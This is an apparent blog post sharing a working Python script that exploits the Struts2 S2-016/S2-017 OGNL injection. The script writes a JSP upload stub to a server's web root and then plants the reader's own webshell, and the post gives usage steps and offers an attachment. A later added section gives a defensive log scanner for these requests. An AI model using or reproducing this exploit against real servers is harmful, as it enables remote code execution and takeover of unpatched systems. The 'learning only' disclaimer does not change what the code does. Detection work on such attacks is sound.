struts2 S2-016/S2-017 Python GetShell
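I had been studying PHP and needed to write a CTF for our association when I happened to see the latest Struts2 vulnerability, and a getshell for it, posted on WooYun. I can barely read JSP, but after tinkering for a while I found it quite interesting, so I wrote a Python script to automate the getshell.
...before I knew it, it was almost 3 a.m.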
```python
#coding : utf-8
__author__ = 'Phtih0n'
import requests, sys, urllib

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}

def GetHost(url):
    (type, rest) = urllib.splittype(url)
    (host, rest) = urllib.splithost(rest)
    return (type + "://" + host + "/")

def UpData(url):
    ma = file("shell.jsp")
    str = ma.read()
    param = {}
    param['f'] = 'bakup.jsp'
    param['t'] = str
    r = requests.post(url + "phithon.jsp", data=param, headers=headers)
    r = requests.get(url + param['f'], headers=headers, allow_redirects=False)
    if 200 == r.status_code:
        print "success"
        print "shell : " + url + param['f']
    else:
        print "fail"

def GetShell(url):
    test = url + r'''/Struts2/test.action?redirect:${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#p=(#req.getRealPath("/")+"phithon.jsp").replaceAll("\\", "/"),new java.io.BufferedWriter(new java.io.FileWriter(#p)).append(#req.getParameter("c")).close()}&c=<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>'''
    r = requests.get(test, headers = headers )
    url = GetHost(url)
    r = requests.get(url + "phithon.jsp", headers = headers)
    if r.status_code == 200:
        UpData(url)
    else:
        print "fail"

try:
    url = sys.argv[1]
except:
    print "usage : %s url" % sys.argv[0]
GetShell(url)
#/Struts2/test.action?redirect:${#w=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#w.println('[phithon]'),#w.flush(),#w.close()}
```
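The requests this script sends leave a recognisable trail in web server access logs. The following is an added example (Python 3, not part of the original post or its attachment): it flags the `redirect:` / `redirectAction:` / `action:` prefixed parameters of S2-016/S2-017 and hits on the two file names the script writes. The combined-style log format, the sample lines, the `EXPR` placeholder and the label names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

PREFIXES = ("redirect:", "redirectAction:", "action:")  # abused by S2-016/S2-017
DROPPED = {"phithon.jsp", "bakup.jsp"}  # files the script on this page writes
REQUEST = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

def decode(text, rounds=3):
    """Percent-decode several times so double-encoded payloads are normalised."""
    for _ in range(rounds):
        text = unquote(text)
    return text

def classify(target):
    """Return a label for a request target, or None when nothing matches."""
    path, _, query = target.partition("?")
    if decode(path).rsplit("/", 1)[-1] in DROPPED:
        return "dropped-file"
    for param in map(decode, query.split("&")):  # split first, then decode
        for prefix in filter(param.startswith, PREFIXES):
            value = param[len(prefix):]
            if "${" in value or "%{" in value:
                return "ognl-expression"  # S2-016 pattern
            if prefix != "action:" and re.match(r"(?i)(https?:)?//", value):
                return "open-redirect"  # S2-017 pattern
            return "prefixed-parameter"
    return None

def scan(lines):
    """Return (line_number, method, status, label) for each suspicious entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        label = classify(match.group(2)) if match else None
        if label:
            hits.append((number, match.group(1), int(match.group(3)), label))
    return hits

# Constructed log lines: documentation IP, EXPR is a placeholder, not a payload.
SAMPLE = ['203.0.113.5 - - [17/Jul/2013:02:41:10 +0800] "%s HTTP/1.1" %d -' % r for r in [
    ("GET /Struts2/test.action?redirect:%24%7BEXPR%7D&c=x", 302),
    ("POST /phithon.jsp", 200),
    ("GET /Struts2/test.action?redirect%3Ahttp://example.org/", 302),
    ("GET /Struts2/test.action?name=redirect:foo", 200),
    ("GET /Struts2/test.action?action:%2524%257BEXPR%257D", 200),
]]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The `prefixed-parameter` label is low confidence, because the `action:` prefix also has legitimate uses in Struts forms. Both advisories were fixed in Struts 2.3.15.1, so any hit on an older version warrants checking the web root for unexpected `.jsp` files.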
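Requirements and usage:
1. Install the requests library for Python; installation instructions are here: https://cloud.tencent.com/developer/article/1719025
2. Rename your own JSP webshell to "shell.jsp" and put it in the same directory.
3. Usage: simply run UseOfStruts.py http://xxxx/
JSP usually runs with fairly high privileges; once you have a webshell, you are generally an administrator or similar.
That's all from me; keep tinkering, everyone. I'm off to bed...
I have packaged the source file and the JSP webshell I used as an attachment.
Finally, note that the code is for learning only; please do not use it as an attack tool to test domestic websites.
Attachment: Py Struts Getshell.zip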